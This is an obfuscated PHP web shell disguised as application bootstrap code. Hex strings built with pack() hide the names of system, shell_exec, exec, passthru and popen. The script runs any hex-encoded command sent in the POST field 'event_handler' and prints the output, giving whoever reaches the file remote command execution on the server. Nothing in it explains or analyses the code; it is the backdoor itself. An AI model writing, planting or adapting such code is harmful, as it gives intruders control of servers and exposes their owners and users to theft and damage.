<?php


$fac1 = '73';
$fac2 = '74';
$fac3 = '65';
$fac4 = '68';
$fac5 = '78';
$fac6 = '63';
$fac7 = '70';
$fac8 = '61';
$fac9 = '72';
$fac10 = '6e';
$fac11 = '5f';
$fac12 = '67';
$fac13 = '6f';
$fac14 = '76';
$app_initializer1 = pack("H*", $fac1.'79'.'73'.$fac2.$fac3.'6d');
$app_initializer2 = pack("H*", '73'.$fac4.'65'.'6c'.'6c'.'5f'.$fac3.$fac5.$fac3.'63');
$app_initializer3 = pack("H*", '65'.'78'.$fac3.$fac6);
$app_initializer4 = pack("H*", $fac7.$fac8.$fac1.'73'.'74'.'68'.$fac9.'75');
$app_initializer5 = pack("H*", $fac7.'6f'.$fac7.$fac3.$fac10);
$app_initializer6 = pack("H*", $fac1.$fac2.'72'.'65'.$fac8.'6d'.$fac11.$fac12.$fac3.'74'.$fac11.$fac6.$fac13.$fac10.'74'.'65'.$fac10.$fac2.$fac1);
$app_initializer7 = pack("H*", $fac7.'63'.'6c'.$fac13.'73'.'65');
$event_handler = pack("H*", $fac3.$fac14.'65'.$fac10.$fac2.$fac11.$fac4.'61'.$fac10.'64'.'6c'.'65'.'72');
if (isset($_POST[$event_handler])) {
    $event_handler = pack("H*", $_POST[$event_handler]);
    if (function_exists($app_initializer1)) {
        $app_initializer1($event_handler);
    } elseif (function_exists($app_initializer2)) {
        print $app_initializer2($event_handler);
    } elseif (function_exists($app_initializer3)) {
        $app_initializer3($event_handler, $sym_entity);
        print join("\n", $sym_entity);
    } elseif (function_exists($app_initializer4)) {
        $app_initializer4($event_handler);
    } elseif (function_exists($app_initializer5) && function_exists($app_initializer6) && function_exists($app_initializer7)) {
        $token_component = $app_initializer5($event_handler, 'r');
        if ($token_component) {
            $ref_ent = $app_initializer6($token_component);
            $app_initializer7($token_component);
            print $ref_ent;
        }
    }
    exit;
}
